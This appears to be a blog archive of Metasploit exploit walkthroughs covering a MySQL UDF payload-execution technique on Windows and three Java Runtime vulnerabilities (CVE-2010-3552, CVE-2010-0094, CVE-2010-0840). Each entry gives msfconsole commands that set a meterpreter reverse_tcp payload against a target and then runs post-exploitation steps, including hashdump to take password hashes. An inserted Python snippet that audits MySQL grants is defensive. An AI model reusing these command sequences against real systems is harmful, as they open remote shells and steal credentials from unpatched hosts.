Tag Archives: Oracle

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seems to have existed since 2007!
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All MySQL installations on Microsoft Windows that support UDFs, because the default MySQL installation runs with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … INTO DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (<= 5.5.9), directory write permissions are not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine the sys_eval() and sys_exec() functions.

To exploit this weakness, the MySQL targeted user should have the following global privileges :

grant select,insert,file,create routine,alter routine,execute on *.* to test3@'%' identified by 'test3';
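As an added example (not part of the original post or of the Metasploit module), the following Python reads SHOW GRANTS output and lists the accounts whose global grants cover the privilege set above, which is the audit a DBA would run to find accounts exposed to this technique. The SAMPLE_GRANTS lines are constructed, and the secure_file_priv check follows that variable's documented meaning (empty means unrestricted, NULL means file operations disabled, a path confines them to that directory).

```python
import re

# Global privileges the post lists as required for the SELECT ... INTO DUMPFILE
# UDF technique used by exploit/windows/mysql/mysql_payload.
UDF_REQUIRED = {"SELECT", "INSERT", "FILE", "CREATE ROUTINE", "ALTER ROUTINE", "EXECUTE"}

# Matches one line of SHOW GRANTS output; trailing IDENTIFIED BY / WITH clauses are ignored.
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<user>.+?)"
    r"(?:\s+IDENTIFIED.*|\s+WITH.*)?$",
    re.IGNORECASE,
)

def parse_grant(line):
    """Return (user, scope, set_of_privileges) for one SHOW GRANTS line, or None."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return m.group("user").strip(), m.group("scope"), privs

def udf_capable(lines):
    """Accounts whose *.* grants include every privilege in UDF_REQUIRED (or ALL PRIVILEGES).
    Database-level grants (e.g. shop.*) are ignored: FILE and routine creation for a
    DUMPFILE-written library are only relevant at global scope."""
    global_privs = {}
    for line in lines:
        parsed = parse_grant(line)
        if parsed is None:
            continue
        user, scope, privs = parsed
        if scope == "*.*":
            global_privs.setdefault(user, set()).update(privs)
    return sorted(u for u, p in global_privs.items()
                  if "ALL PRIVILEGES" in p or UDF_REQUIRED <= p)

def dumpfile_unrestricted(secure_file_priv):
    """True when SELECT ... INTO DUMPFILE may write anywhere the server account can,
    i.e. secure_file_priv is empty (the default on the installs the post describes)."""
    if secure_file_priv is None or secure_file_priv.strip().upper() == "NULL":
        return False
    return secure_file_priv.strip() == ""

# Constructed sample of SHOW GRANTS output; the password hash is a placeholder.
SAMPLE_GRANTS = [
    "GRANT SELECT, INSERT, FILE, CREATE ROUTINE, ALTER ROUTINE, EXECUTE ON *.* "
    "TO 'test3'@'%' IDENTIFIED BY PASSWORD '*PLACEHOLDER_HASH'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'app'@'localhost'",
    "GRANT SELECT, INSERT, FILE, CREATE ROUTINE, ALTER ROUTINE, EXECUTE ON shop.* TO 'app'@'localhost'",
]

if __name__ == "__main__":
    print("UDF-capable accounts:", udf_capable(SAMPLE_GRANTS))
```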

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump

CVE-2010-3552 : Oracle Java Runtime New Plugin docbase Buffer Overflow

Timeline :

Vulnerability discovered by Stephen Fewer and submitted to ZDI
Vulnerability reported to the vendor by ZDI the 2010-07-20
PoC provided by berendjanwever the 2010-08-31
Coordinated vulnerability disclosure the 2010-10-12
Metasploit PoC provided the 2010-10-25

PoC provided by :

jduck

Reference(s) :

CVE-2010-3552
ZDI-10-206

Affected version(s) :

All Oracle JRE versions prior to version 6 Update 22.

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 20

Description :

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a “launchjnlp” parameter, it will copy the contents of the “docbase” parameter to a stack-buffer using the “sprintf” function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the “WideCharToMultiByte”. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (‘?’). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn’t been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.

Commands :

use exploit/windows/browser/java_docbase_bof
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0094 : Java RMIConnectionImpl Deserialization Privilege Escalation Exploit

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-10-21
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-09-08

PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

Reference(s) :

CVE-2010-0094
ZDI-10-051

Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

Tested on Windows XP SP3 with :

Java 6 Standard Edition Update 18

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows a MarshalledObject containing a custom classloader to be deserialized under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Commands :

use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-08-20

PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

Reference(s) :

CVE-2010-0840
ZDI-10-056

Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

Tested on Windows XP SP3 with :

Java 6 Standard Edition Update 18

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Commands :

use multi/browser/java_trusted_chain
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig